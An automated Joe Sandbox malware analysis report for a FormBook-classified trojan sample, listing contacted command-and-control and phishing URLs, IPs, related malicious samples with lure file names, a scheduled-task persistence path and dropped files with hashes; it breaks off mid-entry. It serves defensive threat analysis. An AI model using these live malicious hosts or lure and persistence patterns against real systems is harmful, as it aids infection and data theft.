https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.drapples.club/q0r6/	100%	Avira URL Cloud	phishing
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.oobzxod2xn.cc/q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.drapples.club/q0r6/	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.drapples.club	100%	Avira URL Cloud	phishing
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.drapples.club	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.oobzxod2xn.cc	172.67.140.176	true	false	2%, Virustotal, Browse	unknown
94950.bodis.com	199.59.243.225	true	false		unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	false	0%, Virustotal, Browse	unknown
www.birthingwitht.com	unknown	unknown	true		unknown
www.drapples.club	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.oobzxod2xn.cc/q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS	false	Avira URL Cloud: safe	unknown
http://www.drapples.club/q0r6/	false	0%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.drapples.club	usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.ecosia.org/newtab/	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FGGx944Qu7.exe, 00000000.00000002.1688859188.000000000326F000.00000004.00000800.00020000.00000000.sdmp, TBsjWljiCpR.exe, 00000009.00000002.1885020055.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.140.176	www.oobzxod2xn.cc	United States	13335	CLOUDFLARENETUS	false
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	false
199.59.243.225	94950.bodis.com	United States	395082	BODIS-NJUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1443953
Start date and time:	2024-05-19 08:04:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FGGx944Qu7.exe renamed because original name is a hash value
Original Sample Name:	21d18e20b8b0e17e0b554b5940a7aaed.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/16@6/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 280
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe
Excluded IPs from analysis (whitelisted): 20.223.36.55
Excluded domains from analysis (whitelisted): ocsp.usertrust.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl.usertrust.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, ocsp.comodoca.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:04:52	API Interceptor	1x Sleep call for process: FGGx944Qu7.exe modified
02:04:55	API Interceptor	42x Sleep call for process: powershell.exe modified
02:05:00	API Interceptor	1x Sleep call for process: TBsjWljiCpR.exe modified
02:06:05	API Interceptor	1274978x Sleep call for process: SearchProtocolHost.exe modified
07:04:57	Task Scheduler	Run new task: TBsjWljiCpR path: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.140.176	G7DzDN2VcB.exe	Get hash	malicious	FormBook	Browse	www.oobzxod2xn.cc/q0r6/
172.67.140.176	APRILPR, 24.doc	Get hash	malicious	FormBook	Browse	www.oobzxod2xn.cc/q0r6/
34.149.87.45	bin.exe	Get hash	malicious	FormBook	Browse	www.ycwtch.co.uk/obbu/
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.gotoacts.com/q0kk/
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tlcpressurewashingllc.com/ktu3/
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U0444#U0435#U0432#U0440#U0430#U043b#U044c.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tlcpressurewashingllc.com/ktu3/
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tlcpressurewashingllc.com/ktu3/
	F24-005880.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.century21morenoycia.mx/op6t/
	pedido comprado.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.century21morenoycia.mx/op6t/
	orden de carga.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.century21morenoycia.mx/op6t/
	Factura1-FVO-2024000893.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.century21morenoycia.mx/op6t/
	098754345678.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cawthonisland.com/z912/
199.59.243.225	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	www.versegenai.com/mcz6/
	nPLN.exe	Get hash	malicious	FormBook	Browse	www.etrading.cloud/gy0x/
	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	www.friendsfavorites.pet/faug/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.gaglianoart.com/ntpp/
	bin.exe	Get hash	malicious	FormBook	Browse	www.etrading.cloud/xxks/
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	www.pharmacielorraine.fr/opfh/
	Purchase Order_20240516.exe	Get hash	malicious	FormBook	Browse	www.etrading.cloud/gy0x/
	RFQ0240515.XLS.bat.exe	Get hash	malicious	FormBook	Browse	www.gaglianoart.com/tkc9/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.zwervertjes.be/mcz6/
	JUSTIFICANTE DE PAGO 18903547820000.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.gaglianoart.com/ntpp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94950.bodis.com	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	nPLN.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	bin.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Purchase Order_20240516.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	G7DzDN2VcB.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	APRILPR, 24.doc	Get hash	malicious	FormBook	Browse	199.59.243.225
	TS-240514-UF2.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.59.243.225
td-ccm-neg-87-45.wixdns.net	APR0927,24.doc	Get hash	malicious	FormBook	Browse	34.149.87.45
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	bin.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U0444#U0435#U0432#U0440#U0430#U043b#U044c.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	#U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	34.149.87.45
	F24-005880.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	pedido comprado.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	orden de carga.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
www.oobzxod2xn.cc	G7DzDN2VcB.exe	Get hash	malicious	FormBook	Browse	172.67.140.176
	APRILPR, 24.doc	Get hash	malicious	FormBook	Browse	172.67.140.176
	TS-240514-UF2.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.54.171

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATGS-MMD-ASUS	APR0927,24.doc	Get hash	malicious	FormBook	Browse	34.149.87.45
	cOADrrPFLT.elf	Get hash	malicious	Mirai	Browse	34.12.26.79
	d3j5Qle8Zv.elf	Get hash	malicious	Unknown	Browse	57.171.124.94
	NA9GDRMmA3.elf	Get hash	malicious	Unknown	Browse	32.240.191.156
	zRN6jGaewE.elf	Get hash	malicious	Unknown	Browse	32.17.202.163
	http://cosctodeals.online	Get hash	malicious	Unknown	Browse	34.160.42.24
	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	34.132.146.171
	bin.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	https://secure.virtru.com/start/?c=custom&t=verizon-1-0-2&s=cfsbulkacts%40verizon.com&p=39158083-b742-459c-a4f7-b97e1bfe9688#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2F39158083-b742-459c-a4f7-b97e1bfe9688%2Fdata%2Fmetadata&dk=8S4mr%2BPv4dPvbs%2BUmPStohnlLSN2aZA27W6zdB5JbGA%3D	Get hash	malicious	Unknown	Browse	34.160.98.162
	https://url.us.m.mimecastprotect.com/s/m0zFC5yEYqhPZQA5tz31aK?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	34.36.216.150
CLOUDFLARENETUS	dehdsDiT1p.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	172.67.220.228
	XCrZ8JPOBH.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.38.193
	https://storage.googleapis.com/techtomanagerbulk/soutlast_btohrdasdasdwerwererudsxcxvxcvuuye_cl.html#KyyJkdVOQc	Get hash	malicious	Phisher	Browse	172.67.140.238
	TS-240519-Blank1.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	TS-240519-Blank2.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	https://cloude-dd47.aeancsesekhi.workers.dev/	Get hash	malicious	Unknown	Browse	172.67.184.54
	https://pub-c1bcc0c6146148ceb99d51a78ad5513b.r2.dev/kenelumoba.html	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://jgunrwigiwbegubeggrggrg.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://a1-8st.pages.dev/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://gfnbtr.bhtrdm.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
BODIS-NJUS	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	nPLN.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.225
	bin.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	https://pub-ecb1731253fc43b1be7bb38cb575d5d6.r2.dev/Chimzy.html	Get hash	malicious	HTMLPhisher	Browse	199.59.243.225
	Purchase Order_20240516.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	RFQ0240515.XLS.bat.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Factura (3).exe	Get hash	malicious	FormBook	Browse	199.59.243.225

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	APR0927,24.doc	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FGGx944Qu7.exe.log

Download File

Process:	C:\Users\user\Desktop\FGGx944Qu7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TBsjWljiCpR.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeoM0Uyus:+LHxvCsIcnSKRHmOugU1s
MD5:	EFC6A63D5F23F5AC7FECDFF451741D55
SHA1:	E5D4F71EDFE006A4625D308446757E6F3E218895
SHA-256:	539B0A534102AC5E5F0292C7129D93F1F081ED0D65F40BAC9C6C7E67F1F94983
SHA-512:	13E8224D796FECCC95513E054AD23907138F8C28ABFA6611F534AC1BB7FA1BFCABB452E2EA8EA10B2D311912BEDF3690B2C6304B77D1F669B9438831C99787A0
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\20291vC

Download File

Process:	C:\Windows\SysWOW64\SearchProtocolHost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1k4wtsks.qys.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rfx4p55.jzt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odq22e3.wb2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uya4cokv.3zx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wftn1kob.rrm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wms5kunf.vwh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys2tmhij.gni.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuw0b1st.zey.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
